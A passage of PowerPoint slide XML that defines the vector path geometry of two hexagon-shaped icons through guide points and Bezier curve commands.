                  <a:gd name="connsiteX3" fmla="*/ 0 w 342900"/>
                  <a:gd name="connsiteY3" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 342900"/>
                  <a:gd name="connsiteY4" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX5" fmla="*/ 24814 w 342900"/>
                  <a:gd name="connsiteY5" fmla="*/ 303933 h 381000"/>
                  <a:gd name="connsiteX6" fmla="*/ 146636 w 342900"/>
                  <a:gd name="connsiteY6" fmla="*/ 374342 h 381000"/>
                  <a:gd name="connsiteX7" fmla="*/ 196264 w 342900"/>
                  <a:gd name="connsiteY7" fmla="*/ 374342 h 381000"/>
                  <a:gd name="connsiteX8" fmla="*/ 318086 w 342900"/>
                  <a:gd name="connsiteY8" fmla="*/ 303933 h 381000"/>
                  <a:gd name="connsiteX9" fmla="*/ 342900 w 342900"/>
                  <a:gd name="connsiteY9" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX10" fmla="*/ 342900 w 342900"/>
                  <a:gd name="connsiteY10" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX11" fmla="*/ 318086 w 342900"/>
                  <a:gd name="connsiteY11" fmla="*/ 77067 h 381000"/>
                  <a:gd name="connsiteX12" fmla="*/ 196264 w 342900"/>
                  <a:gd name="connsiteY12" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX13" fmla="*/ 158452 w 342900"/>
                  <a:gd name="connsiteY13" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX14" fmla="*/ 184448 w 342900"/>
                  <a:gd name="connsiteY14" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX15" fmla="*/ 219682 w 342900"/>
                  <a:gd name="connsiteY15" fmla="*/ 47511 h 381000"/>
                  <a:gd name="connsiteX16" fmla="*/ 112532 w 342900"/>
                  <a:gd name="connsiteY16" fmla="*/ 102470 h 381000"/>
                  <a:gd name="connsiteX17" fmla="*/ 65444 w 342900"/>
                  <a:gd name="connsiteY17" fmla="*/ 190729 h 381000"/>
                  <a:gd name="connsiteX18" fmla="*/ 159369 w 342900"/>
                  <a:gd name="connsiteY18" fmla="*/ 296218 h 381000"/>
                  <a:gd name="connsiteX19" fmla="*/ 92473 w 342900"/>
                  <a:gd name="connsiteY19" fmla="*/ 315725 h 381000"/>
                  <a:gd name="connsiteX20" fmla="*/ 36629 w 342900"/>
                  <a:gd name="connsiteY20" fmla="*/ 283445 h 381000"/>
                  <a:gd name="connsiteX21" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY21" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX22" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY22" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX23" fmla="*/ 36629 w 342900"/>
                  <a:gd name="connsiteY23" fmla="*/ 97555 h 381000"/>
                  <a:gd name="connsiteX24" fmla="*/ 158452 w 342900"/>
                  <a:gd name="connsiteY24" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX25" fmla="*/ 123575 w 342900"/>
                  <a:gd name="connsiteY25" fmla="*/ 333699 h 381000"/>
                  <a:gd name="connsiteX26" fmla="*/ 158452 w 342900"/>
                  <a:gd name="connsiteY26" fmla="*/ 353854 h 381000"/>
                  <a:gd name="connsiteX27" fmla="*/ 184448 w 342900"/>
                  <a:gd name="connsiteY27" fmla="*/ 353854 h 381000"/>
                  <a:gd name="connsiteX28" fmla="*/ 306271 w 342900"/>
                  <a:gd name="connsiteY28" fmla="*/ 283445 h 381000"/>
                  <a:gd name="connsiteX29" fmla="*/ 319268 w 342900"/>
                  <a:gd name="connsiteY29" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX30" fmla="*/ 319268 w 342900"/>
                  <a:gd name="connsiteY30" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX31" fmla="*/ 306271 w 342900"/>
                  <a:gd name="connsiteY31" fmla="*/ 97555 h 381000"/>
                  <a:gd name="connsiteX32" fmla="*/ 250785 w 342900"/>
                  <a:gd name="connsiteY32" fmla="*/ 65484 h 381000"/>
                  <a:gd name="connsiteX33" fmla="*/ 250591 w 342900"/>
                  <a:gd name="connsiteY33" fmla="*/ 65513 h 381000"/>
                  <a:gd name="connsiteX34" fmla="*/ 183392 w 342900"/>
                  <a:gd name="connsiteY34" fmla="*/ 85220 h 381000"/>
                  <a:gd name="connsiteX35" fmla="*/ 277565 w 342900"/>
                  <a:gd name="connsiteY35" fmla="*/ 190729 h 381000"/>
                  <a:gd name="connsiteX36" fmla="*/ 230924 w 342900"/>
                  <a:gd name="connsiteY36" fmla="*/ 278692 h 381000"/>
                  <a:gd name="connsiteX37" fmla="*/ 230006 w 342900"/>
                  <a:gd name="connsiteY37" fmla="*/ 279397 h 381000"/>
                  <a:gd name="connsiteX38" fmla="*/ 123575 w 342900"/>
                  <a:gd name="connsiteY38" fmla="*/ 333699 h 381000"/>
                  <a:gd name="connsiteX39" fmla="*/ 219376 w 342900"/>
                  <a:gd name="connsiteY39" fmla="*/ 257918 h 381000"/>
                  <a:gd name="connsiteX40" fmla="*/ 253934 w 342900"/>
                  <a:gd name="connsiteY40" fmla="*/ 190729 h 381000"/>
                  <a:gd name="connsiteX41" fmla="*/ 171505 w 342900"/>
                  <a:gd name="connsiteY41" fmla="*/ 108213 h 381000"/>
                  <a:gd name="connsiteX42" fmla="*/ 126753 w 342900"/>
                  <a:gd name="connsiteY42" fmla="*/ 121425 h 381000"/>
                  <a:gd name="connsiteX43" fmla="*/ 125454 w 342900"/>
                  <a:gd name="connsiteY43" fmla="*/ 122282 h 381000"/>
                  <a:gd name="connsiteX44" fmla="*/ 89077 w 342900"/>
                  <a:gd name="connsiteY44" fmla="*/ 190729 h 381000"/>
                  <a:gd name="connsiteX45" fmla="*/ 171505 w 342900"/>
                  <a:gd name="connsiteY45" fmla="*/ 273253 h 381000"/>
                  <a:gd name="connsiteX46" fmla="*/ 216371 w 342900"/>
                  <a:gd name="connsiteY46" fmla="*/ 259966 h 381000"/>
                  <a:gd name="connsiteX47" fmla="*/ 218802 w 342900"/>
                  <a:gd name="connsiteY47" fmla="*/ 257918 h 381000"/>
                  <a:gd name="connsiteX48" fmla="*/ 219376 w 342900"/>
                  <a:gd name="connsiteY48" fmla="*/ 25791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42900" h="381000">
                    <a:moveTo>
                      <a:pt x="196264" y="6658"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="180908" y="-2219"/>
                      <a:pt x="161991" y="-2219"/>
                      <a:pt x="146636" y="6658"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24814" y="77067"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9458" y="85944"/>
                      <a:pt x="0" y="102346"/>
                      <a:pt x="0" y="120091"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="260909"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="278663"/>
                      <a:pt x="9458" y="295065"/>
                      <a:pt x="24814" y="303933"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="146636" y="374342"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="161991" y="383219"/>
                      <a:pt x="180908" y="383219"/>
                      <a:pt x="196264" y="374342"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="318086" y="303933"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="333441" y="295065"/>
                      <a:pt x="342900" y="278663"/>
                      <a:pt x="342900" y="260909"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="342900" y="120091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="342900" y="102346"/>
                      <a:pt x="333441" y="85944"/>
                      <a:pt x="318086" y="77067"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="196264" y="6658"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="158452" y="27146"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="166495" y="22498"/>
                      <a:pt x="176405" y="22498"/>
                      <a:pt x="184448" y="27146"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="219682" y="47511"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="181205" y="57179"/>
                      <a:pt x="144464" y="75486"/>
                      <a:pt x="112532" y="102470"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84137" y="121520"/>
                      <a:pt x="65444" y="153943"/>
                      <a:pt x="65444" y="190729"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65444" y="245259"/>
                      <a:pt x="106510" y="290189"/>
                      <a:pt x="159369" y="296218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137927" y="305981"/>
                      <a:pt x="115373" y="312477"/>
                      <a:pt x="92473" y="315725"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="36629" y="283445"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="28586" y="278797"/>
                      <a:pt x="23632" y="270205"/>
                      <a:pt x="23632" y="260909"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23632" y="120091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="23632" y="110795"/>
                      <a:pt x="28586" y="102203"/>
                      <a:pt x="36629" y="97555"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="158452" y="27146"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="123575" y="333699"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="158452" y="353854"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="166495" y="358502"/>
                      <a:pt x="176405" y="358502"/>
                      <a:pt x="184448" y="353854"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="306271" y="283445"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="314314" y="278797"/>
                      <a:pt x="319268" y="270205"/>
                      <a:pt x="319268" y="260909"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319268" y="120091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="319268" y="110795"/>
                      <a:pt x="314314" y="102203"/>
                      <a:pt x="306271" y="97555"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="250785" y="65484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250591" y="65513"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="227544" y="68809"/>
                      <a:pt x="204896" y="75371"/>
                      <a:pt x="183392" y="85220"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="236372" y="91135"/>
                      <a:pt x="277565" y="136122"/>
                      <a:pt x="277565" y="190729"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="277565" y="227333"/>
                      <a:pt x="259070" y="259604"/>
                      <a:pt x="230924" y="278692"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230692" y="278892"/>
                      <a:pt x="230383" y="279140"/>
                      <a:pt x="230006" y="279397"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198217" y="306029"/>
                      <a:pt x="161707" y="324117"/>
                      <a:pt x="123575" y="333699"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="219376" y="257918"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="240297" y="242954"/>
                      <a:pt x="253934" y="218437"/>
                      <a:pt x="253934" y="190729"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="253934" y="145161"/>
                      <a:pt x="217029" y="108213"/>
                      <a:pt x="171505" y="108213"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155007" y="108213"/>
                      <a:pt x="139640" y="113071"/>
                      <a:pt x="126753" y="121425"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126335" y="121739"/>
                      <a:pt x="125900" y="122034"/>
                      <a:pt x="125454" y="122282"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103508" y="137112"/>
                      <a:pt x="89077" y="162239"/>
                      <a:pt x="89077" y="190729"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89077" y="236306"/>
                      <a:pt x="125981" y="273253"/>
                      <a:pt x="171505" y="273253"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188052" y="273253"/>
                      <a:pt x="203460" y="268367"/>
                      <a:pt x="216371" y="259966"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="218802" y="257918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219376" y="257918"/>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1819CF8-6442-0AC9-CA37-E1045761E0DA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9849418" y="2047223"/>
                <a:ext cx="986079" cy="1094828"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 147733 w 345471"/>
                  <a:gd name="connsiteY0" fmla="*/ 6715 h 383571"/>
                  <a:gd name="connsiteX1" fmla="*/ 197739 w 345471"/>
                  <a:gd name="connsiteY1" fmla="*/ 6715 h 383571"/>
                  <a:gd name="connsiteX2" fmla="*/ 320516 w 345471"/>
                  <a:gd name="connsiteY2" fmla="*/ 77581 h 383571"/>
                  <a:gd name="connsiteX3" fmla="*/ 345472 w 345471"/>
                  <a:gd name="connsiteY3" fmla="*/ 120920 h 383571"/>
                  <a:gd name="connsiteX4" fmla="*/ 345472 w 345471"/>
                  <a:gd name="connsiteY4" fmla="*/ 262652 h 383571"/>
                  <a:gd name="connsiteX5" fmla="*/ 320516 w 345471"/>
                  <a:gd name="connsiteY5" fmla="*/ 305991 h 383571"/>
                  <a:gd name="connsiteX6" fmla="*/ 197739 w 345471"/>
                  <a:gd name="connsiteY6" fmla="*/ 376857 h 383571"/>
                  <a:gd name="connsiteX7" fmla="*/ 147733 w 345471"/>
                  <a:gd name="connsiteY7" fmla="*/ 376857 h 383571"/>
                  <a:gd name="connsiteX8" fmla="*/ 24955 w 345471"/>
                  <a:gd name="connsiteY8" fmla="*/ 305991 h 383571"/>
                  <a:gd name="connsiteX9" fmla="*/ 0 w 345471"/>
                  <a:gd name="connsiteY9" fmla="*/ 262652 h 383571"/>
                  <a:gd name="connsiteX10" fmla="*/ 0 w 345471"/>
                  <a:gd name="connsiteY10" fmla="*/ 120920 h 383571"/>
                  <a:gd name="connsiteX11" fmla="*/ 24955 w 345471"/>
                  <a:gd name="connsiteY11" fmla="*/ 77581 h 383571"/>
                  <a:gd name="connsiteX12" fmla="*/ 147733 w 345471"/>
                  <a:gd name="connsiteY12" fmla="*/ 6715 h 383571"/>
                  <a:gd name="connsiteX13" fmla="*/ 185833 w 345471"/>
                  <a:gd name="connsiteY13" fmla="*/ 27289 h 383571"/>
                  <a:gd name="connsiteX14" fmla="*/ 159639 w 345471"/>
                  <a:gd name="connsiteY14" fmla="*/ 27289 h 383571"/>
                  <a:gd name="connsiteX15" fmla="*/ 73914 w 345471"/>
                  <a:gd name="connsiteY15" fmla="*/ 76819 h 383571"/>
                  <a:gd name="connsiteX16" fmla="*/ 121158 w 345471"/>
                  <a:gd name="connsiteY16" fmla="*/ 124063 h 383571"/>
                  <a:gd name="connsiteX17" fmla="*/ 121158 w 345471"/>
                  <a:gd name="connsiteY17" fmla="*/ 74533 h 383571"/>
                  <a:gd name="connsiteX18" fmla="*/ 133064 w 345471"/>
                  <a:gd name="connsiteY18" fmla="*/ 62627 h 383571"/>
                  <a:gd name="connsiteX19" fmla="*/ 144971 w 345471"/>
                  <a:gd name="connsiteY19" fmla="*/ 74533 h 383571"/>
                  <a:gd name="connsiteX20" fmla="*/ 144971 w 345471"/>
                  <a:gd name="connsiteY20" fmla="*/ 147876 h 383571"/>
                  <a:gd name="connsiteX21" fmla="*/ 172403 w 345471"/>
                  <a:gd name="connsiteY21" fmla="*/ 175308 h 383571"/>
                  <a:gd name="connsiteX22" fmla="*/ 201740 w 345471"/>
                  <a:gd name="connsiteY22" fmla="*/ 145971 h 383571"/>
                  <a:gd name="connsiteX23" fmla="*/ 201740 w 345471"/>
                  <a:gd name="connsiteY23" fmla="*/ 74533 h 383571"/>
                  <a:gd name="connsiteX24" fmla="*/ 213646 w 345471"/>
                  <a:gd name="connsiteY24" fmla="*/ 62627 h 383571"/>
                  <a:gd name="connsiteX25" fmla="*/ 225552 w 345471"/>
                  <a:gd name="connsiteY25" fmla="*/ 74533 h 383571"/>
                  <a:gd name="connsiteX26" fmla="*/ 225552 w 345471"/>
                  <a:gd name="connsiteY26" fmla="*/ 122158 h 383571"/>
                  <a:gd name="connsiteX27" fmla="*/ 271177 w 345471"/>
                  <a:gd name="connsiteY27" fmla="*/ 76533 h 383571"/>
                  <a:gd name="connsiteX28" fmla="*/ 185928 w 345471"/>
                  <a:gd name="connsiteY28" fmla="*/ 27289 h 383571"/>
                  <a:gd name="connsiteX29" fmla="*/ 155543 w 345471"/>
                  <a:gd name="connsiteY29" fmla="*/ 192072 h 383571"/>
                  <a:gd name="connsiteX30" fmla="*/ 126016 w 345471"/>
                  <a:gd name="connsiteY30" fmla="*/ 162544 h 383571"/>
                  <a:gd name="connsiteX31" fmla="*/ 56769 w 345471"/>
                  <a:gd name="connsiteY31" fmla="*/ 162544 h 383571"/>
                  <a:gd name="connsiteX32" fmla="*/ 44863 w 345471"/>
                  <a:gd name="connsiteY32" fmla="*/ 150638 h 383571"/>
                  <a:gd name="connsiteX33" fmla="*/ 56769 w 345471"/>
                  <a:gd name="connsiteY33" fmla="*/ 138732 h 383571"/>
                  <a:gd name="connsiteX34" fmla="*/ 102203 w 345471"/>
                  <a:gd name="connsiteY34" fmla="*/ 138732 h 383571"/>
                  <a:gd name="connsiteX35" fmla="*/ 52483 w 345471"/>
                  <a:gd name="connsiteY35" fmla="*/ 89011 h 383571"/>
                  <a:gd name="connsiteX36" fmla="*/ 36862 w 345471"/>
                  <a:gd name="connsiteY36" fmla="*/ 98060 h 383571"/>
                  <a:gd name="connsiteX37" fmla="*/ 23717 w 345471"/>
                  <a:gd name="connsiteY37" fmla="*/ 120729 h 383571"/>
                  <a:gd name="connsiteX38" fmla="*/ 23717 w 345471"/>
                  <a:gd name="connsiteY38" fmla="*/ 262461 h 383571"/>
                  <a:gd name="connsiteX39" fmla="*/ 36862 w 345471"/>
                  <a:gd name="connsiteY39" fmla="*/ 285131 h 383571"/>
                  <a:gd name="connsiteX40" fmla="*/ 52959 w 345471"/>
                  <a:gd name="connsiteY40" fmla="*/ 294465 h 383571"/>
                  <a:gd name="connsiteX41" fmla="*/ 103346 w 345471"/>
                  <a:gd name="connsiteY41" fmla="*/ 244078 h 383571"/>
                  <a:gd name="connsiteX42" fmla="*/ 56674 w 345471"/>
                  <a:gd name="connsiteY42" fmla="*/ 244078 h 383571"/>
                  <a:gd name="connsiteX43" fmla="*/ 44768 w 345471"/>
                  <a:gd name="connsiteY43" fmla="*/ 232172 h 383571"/>
                  <a:gd name="connsiteX44" fmla="*/ 56674 w 345471"/>
                  <a:gd name="connsiteY44" fmla="*/ 220266 h 383571"/>
                  <a:gd name="connsiteX45" fmla="*/ 127159 w 345471"/>
                  <a:gd name="connsiteY45" fmla="*/ 220266 h 383571"/>
                  <a:gd name="connsiteX46" fmla="*/ 155448 w 345471"/>
                  <a:gd name="connsiteY46" fmla="*/ 191976 h 383571"/>
                  <a:gd name="connsiteX47" fmla="*/ 172403 w 345471"/>
                  <a:gd name="connsiteY47" fmla="*/ 208931 h 383571"/>
                  <a:gd name="connsiteX48" fmla="*/ 201740 w 345471"/>
                  <a:gd name="connsiteY48" fmla="*/ 238268 h 383571"/>
                  <a:gd name="connsiteX49" fmla="*/ 201740 w 345471"/>
                  <a:gd name="connsiteY49" fmla="*/ 308467 h 383571"/>
                  <a:gd name="connsiteX50" fmla="*/ 213646 w 345471"/>
                  <a:gd name="connsiteY50" fmla="*/ 320373 h 383571"/>
                  <a:gd name="connsiteX51" fmla="*/ 225552 w 345471"/>
                  <a:gd name="connsiteY51" fmla="*/ 308467 h 383571"/>
                  <a:gd name="connsiteX52" fmla="*/ 225552 w 345471"/>
                  <a:gd name="connsiteY52" fmla="*/ 262080 h 383571"/>
                  <a:gd name="connsiteX53" fmla="*/ 270605 w 345471"/>
                  <a:gd name="connsiteY53" fmla="*/ 307134 h 383571"/>
                  <a:gd name="connsiteX54" fmla="*/ 185833 w 345471"/>
                  <a:gd name="connsiteY54" fmla="*/ 356092 h 383571"/>
                  <a:gd name="connsiteX55" fmla="*/ 159639 w 345471"/>
                  <a:gd name="connsiteY55" fmla="*/ 356092 h 383571"/>
                  <a:gd name="connsiteX56" fmla="*/ 74390 w 345471"/>
                  <a:gd name="connsiteY56" fmla="*/ 306848 h 383571"/>
                  <a:gd name="connsiteX57" fmla="*/ 121063 w 345471"/>
                  <a:gd name="connsiteY57" fmla="*/ 260175 h 383571"/>
                  <a:gd name="connsiteX58" fmla="*/ 121063 w 345471"/>
                  <a:gd name="connsiteY58" fmla="*/ 308467 h 383571"/>
                  <a:gd name="connsiteX59" fmla="*/ 132969 w 345471"/>
                  <a:gd name="connsiteY59" fmla="*/ 320373 h 383571"/>
                  <a:gd name="connsiteX60" fmla="*/ 144875 w 345471"/>
                  <a:gd name="connsiteY60" fmla="*/ 308467 h 383571"/>
                  <a:gd name="connsiteX61" fmla="*/ 144875 w 345471"/>
                  <a:gd name="connsiteY61" fmla="*/ 236363 h 383571"/>
                  <a:gd name="connsiteX62" fmla="*/ 172307 w 345471"/>
                  <a:gd name="connsiteY62" fmla="*/ 208931 h 383571"/>
                  <a:gd name="connsiteX63" fmla="*/ 292037 w 345471"/>
                  <a:gd name="connsiteY63" fmla="*/ 294846 h 383571"/>
                  <a:gd name="connsiteX64" fmla="*/ 308705 w 345471"/>
                  <a:gd name="connsiteY64" fmla="*/ 285226 h 383571"/>
                  <a:gd name="connsiteX65" fmla="*/ 321850 w 345471"/>
                  <a:gd name="connsiteY65" fmla="*/ 262557 h 383571"/>
                  <a:gd name="connsiteX66" fmla="*/ 321850 w 345471"/>
                  <a:gd name="connsiteY66" fmla="*/ 120825 h 383571"/>
                  <a:gd name="connsiteX67" fmla="*/ 308705 w 345471"/>
                  <a:gd name="connsiteY67" fmla="*/ 98155 h 383571"/>
                  <a:gd name="connsiteX68" fmla="*/ 292608 w 345471"/>
                  <a:gd name="connsiteY68" fmla="*/ 88821 h 383571"/>
                  <a:gd name="connsiteX69" fmla="*/ 242602 w 345471"/>
                  <a:gd name="connsiteY69" fmla="*/ 138827 h 383571"/>
                  <a:gd name="connsiteX70" fmla="*/ 289941 w 345471"/>
                  <a:gd name="connsiteY70" fmla="*/ 138827 h 383571"/>
                  <a:gd name="connsiteX71" fmla="*/ 301847 w 345471"/>
                  <a:gd name="connsiteY71" fmla="*/ 150733 h 383571"/>
                  <a:gd name="connsiteX72" fmla="*/ 289941 w 345471"/>
                  <a:gd name="connsiteY72" fmla="*/ 162639 h 383571"/>
                  <a:gd name="connsiteX73" fmla="*/ 218789 w 345471"/>
                  <a:gd name="connsiteY73" fmla="*/ 162639 h 383571"/>
                  <a:gd name="connsiteX74" fmla="*/ 189262 w 345471"/>
                  <a:gd name="connsiteY74" fmla="*/ 192167 h 383571"/>
                  <a:gd name="connsiteX75" fmla="*/ 217551 w 345471"/>
                  <a:gd name="connsiteY75" fmla="*/ 220456 h 383571"/>
                  <a:gd name="connsiteX76" fmla="*/ 289941 w 345471"/>
                  <a:gd name="connsiteY76" fmla="*/ 220456 h 383571"/>
                  <a:gd name="connsiteX77" fmla="*/ 301847 w 345471"/>
                  <a:gd name="connsiteY77" fmla="*/ 232362 h 383571"/>
                  <a:gd name="connsiteX78" fmla="*/ 289941 w 345471"/>
                  <a:gd name="connsiteY78" fmla="*/ 244269 h 383571"/>
                  <a:gd name="connsiteX79" fmla="*/ 241364 w 345471"/>
                  <a:gd name="connsiteY79" fmla="*/ 244269 h 383571"/>
                  <a:gd name="connsiteX80" fmla="*/ 292037 w 345471"/>
                  <a:gd name="connsiteY80" fmla="*/ 294942 h 38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5471" h="383571">
                    <a:moveTo>
                      <a:pt x="147733" y="6715"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="163163" y="-2238"/>
                      <a:pt x="182309" y="-2238"/>
                      <a:pt x="197739" y="6715"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="320516" y="77581"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="335947" y="86535"/>
                      <a:pt x="345472" y="103013"/>
                      <a:pt x="345472" y="120920"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="345472" y="262652"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="345472" y="280559"/>
                      <a:pt x="335947" y="297037"/>
                      <a:pt x="320516" y="305991"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="197739" y="376857"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="182309" y="385810"/>
                      <a:pt x="163163" y="385810"/>
                      <a:pt x="147733" y="376857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24955" y="305991"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9525" y="297037"/>
                      <a:pt x="0" y="280559"/>
                      <a:pt x="0" y="262652"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="120920"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="103013"/>
                      <a:pt x="9525" y="86535"/>
                      <a:pt x="24955" y="77581"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="147733" y="6715"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="185833" y="27289"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="177737" y="22622"/>
                      <a:pt x="167735" y="22622"/>
                      <a:pt x="159639" y="27289"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="73914" y="76819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121158" y="124063"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121158" y="74533"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="121158" y="67961"/>
                      <a:pt x="126492" y="62627"/>
                      <a:pt x="133064" y="62627"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139637" y="62627"/>
                      <a:pt x="144971" y="67961"/>
                      <a:pt x="144971" y="74533"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="144971" y="147876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172403" y="175308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201740" y="145971"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201740" y="74533"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="201740" y="67961"/>
                      <a:pt x="207074" y="62627"/>
                      <a:pt x="213646" y="62627"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="220218" y="62627"/>
                      <a:pt x="225552" y="67961"/>
                      <a:pt x="225552" y="74533"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="225552" y="122158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271177" y="76533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185928" y="27289"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="155543" y="192072"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="126016" y="162544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56769" y="162544"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="50197" y="162544"/>
                      <a:pt x="44863" y="157210"/>
                      <a:pt x="44863" y="150638"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44863" y="144066"/>
                      <a:pt x="50197" y="138732"/>
                      <a:pt x="56769" y="138732"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102203" y="138732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52483" y="89011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36862" y="98060"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="28766" y="102727"/>
                      <a:pt x="23717" y="111395"/>
                      <a:pt x="23717" y="120729"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23717" y="262461"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="23717" y="271796"/>
                      <a:pt x="28670" y="280464"/>
                      <a:pt x="36862" y="285131"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="52959" y="294465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103346" y="244078"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56674" y="244078"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="50102" y="244078"/>
